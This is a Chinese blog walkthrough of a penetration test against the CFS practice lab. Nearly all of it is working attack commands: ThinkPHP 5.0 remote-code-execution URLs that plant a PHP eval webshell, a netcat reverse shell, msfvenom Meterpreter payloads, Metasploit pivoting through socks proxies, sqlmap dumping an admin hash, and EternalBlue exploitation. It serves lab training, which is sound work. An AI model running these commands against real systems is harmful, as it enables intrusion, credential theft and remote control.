zoukankan      html  css  js  c++  java

  • CFS靶机

    nmap扫描

    nmap -sV -p1-65535 192.168.1.135

    thinkphp5.0版本

    找到poc进行测试

    http://192.168.1.135/index.php?s=index/ hinkapp/invokefunction&function=call_user_func_array&vars[0]=phpinfo&vars[1][]=1

    http://192.168.1.135/index.php?s=index/thinkapp/invokefunction&function=call_user_func_array&vars[0]=system&vars[1][]=echo "<?php @eval($_POST['cmd']);?>" > 1.php

    写入成功

    进行转义

    http://192.168.1.135/index.php?s=/index/ hinkapp/invokefunction&function=call_user_func_array&vars[0]=system&vars[1][]=echo "<?php @eval($_POST['cmd']);?>" >2.php

    或者使用base64位编码

    <?php @eval($_POST['cmd']);?>

    转码位

    PD9waHAgQGV2YWwoJF9QT1NUWyJjbWQiXSk7Pz4=

    http://192.168.1.103/index.php?s=index/thinkapp/invokefunction&function=call_user_func_array&vars[0]=system&vars[1][]=echo "PD9waHAgQGV2YWwoJF9QT1NUWydjbWQnXSk7Pz4="| base64 -d > 3.php

    反弹kali

    nc 192.168.1.104 6666 -e /bin/bash

    kali获取bash

    python -c 'import pty;pty.spawn("/bin/bash")'

    flag

    msf生成木马

    msfvenom -p linux/x64/meterpreter/reverse_tcp LHOST=192.168.1.128 LPORT=1234  -f elf >1.elf

    蚁剑上传

    chmod 777 1.elf

    ./elf

    msf5 > use exploit/multi/handler

    msf5 exploit(multi/handler) > set payload linux/x64/meterpreter/reverse_tcp

    msf5 exploit(multi/handler) > set lhost 192.168.1.128

    msf5 exploit(multi/handler) > set lport 1234

    msf5 exploit(multi/handler) > run

    获取当前的网段

    run get_local_subnets

    添加理由

    run autoroute -s 192.168.22.0/24

    run autoroute -p

    内网扫描

    msf5 exploit(multi/handler) > use auxiliary/scanner/portscan/tcp

    msf5 auxiliary(scanner/portscan/tcp) > set ports 22,389,80,21,3389

    msf5 auxiliary(scanner/portscan/tcp) > set rhosts 192.168.22.0/24

    msf5 auxiliary(scanner/portscan/tcp) > set lhost 192.168.1.128

    设置socks4a代理

    msf5 auxiliary(scanner/portscan/tcp) > use auxiliary/server/socks4a

    msf5 auxiliary(server/socks4a) > set srvport 2222

    srvport => 2222

    msf5 auxiliary(server/socks4a) > run

    [*] Auxiliary module running as background job 0.

    [*] Starting the socks4a proxy server

    msf5 auxiliary(server/socks4a) >

    修改proxychains

    vim /etc/proxychains.conf

    socks4     192.168.1.128     2222

    proxychains nmap -Pn -sT 192.168.22.129

    -Pn:扫描主机检测其是否受到数据包过滤软件或防火墙的保护。

    -sT:扫描TCP数据包已建立的连接connect

    代理打开80网站

    proxychains dirb http://192.168.22.129

    注入

    proxychains sqlmap -u “http://192.168.22.129/index.php?r=vul&keyword=1” -p keyword

    proxychains sqlmap -u “http://192.168.22.129/index.php?r=vul&keyword=1” -p keyword --dbs

    proxychains4 sqlmap -u “http://192.168.22.129/index.php?r=vul&keyword=1” -p keyword -D bagecms -T bage_admin –columns

    proxychains sqlmap -u "http://192.168.22.129/index.php?r=vul&keyword=1" -p keyword -D bagecms -T bage_admin -C username,password –dump

    admin | 46f94c8de14fb36680850768ff1b7f2a (123qwe)

    登录后台

    设置proxifier

    msf生成木马

    msfvenom -p linux/x64/meterpreter/bind_tcp LPORT=432 -f elf > 5.elf

    这次代理使用的bindtcp是Target2作为监听

    proxychains msfconsole

    msf5 > use exploit/multi/handler

    msf5 exploit(multi/handler) > set payload linux/x64/meterpreter/bind_tcp

    msf5 exploit(multi/handler) > set lhost 192.168.1.128

    msf5 exploit(multi/handler) > set lport 432

    msf5 exploit(multi/handler) > run

    获取当前网段

    run get_local_subnets

    添加路由

    run autoroute -s 192.168.33.0/24

    run autoroute -p

    msf5 auxiliary(scanner/portscan/tcp) > use auxiliary/server/socks4a

    msf5 auxiliary(server/socks4a) > set srvport 2223

    srvport => 2223

    msf5 auxiliary(server/socks4a) > run

    [*] Auxiliary module running as background job 2.

    [*] Starting the socks4a proxy server

    msf5 auxiliary(server/socks4a) >

    修改proxychains

    vim /etc/proxychains.conf

    socks4     127.0.0.1     2223

    探测33网段

    use auxiliary/scanner/portscan/tcp

    msf5 auxiliary(scanner/portscan/tcp) > set ports 22,389,80,21,3389

    msf5 auxiliary(scanner/portscan/tcp) > set rhosts 192.168.22.0/24

    msf5 auxiliary(scanner/portscan/tcp) > set lhost 192.168.1.128

    端口扫描

    proxychains nmap -Pn -sT 192.168.33.33

    开放了445和3389端口

    auxiliary/scanner/smb/smb_version

    msf5 auxiliary(scanner/smb/smb_version) > use auxiliary/scanner/smb/smb_ms17_010

    msf5 auxiliary(scanner/smb/smb_ms17_010) > set rhosts 192.168.33.33

    rhosts => 192.168.33.33

    msf5 auxiliary(scanner/smb/smb_ms17_010) > run

    msf5 auxiliary(scanner/smb/smb_ms17_010) > use exploit/windows/smb/ms17_010_eternalblue

    msf5 exploit(windows/smb/ms17_010_eternalblue) > set payload windows/x64/meterpreter/reverse_tcp

    payload => windows/x64/meterpreter/reverse_tcp

    msf5 exploit(windows/smb/ms17_010_eternalblue) > set rhost 192.168.33.33

    rhost => 192.168.33.33

    msf5 exploit(windows/smb/ms17_010_eternalblue) > run

    msf5 exploit(windows/smb/ms17_010_eternalblue) > use exploit/windows/smb/ms17_010_psexec

    msf5 exploit(windows/smb/ms17_010_psexec) > set payload windows/meterpreter/bind_tcp

    payload => windows/meterpreter/bind_tcp

    msf5 exploit(windows/smb/ms17_010_psexec) > set RHOST 192.168.33.33

    RHOST => 192.168.33.33

    msf5 exploit(windows/smb/ms17_010_psexec) > run

    65001 UTF-8代码页 解决乱码

    chcp 65001
  • 相关阅读:
    三元操作符的类型务必一致
    a++ 和 ++a 的区别
    TCP/IP四层协议模型与ISO七层模型
    CentOS 7.0 使用 yum 安装 MariaDB 与 MariaDB 的简单配置
    修改gcc/g++默认include路径
    js中Math.random()生成指定范围数值的随机数
    在 QML 中创建 C++ 导入类型的实例
    QML从文件加载组件简单示例
    Android插件化开发---执行未安装apk中的Service
    游戏开发热门技术浅析
  • 原文地址:https://www.cnblogs.com/bingtang123/p/13576936.html
Copyright © 2011-2022 走看看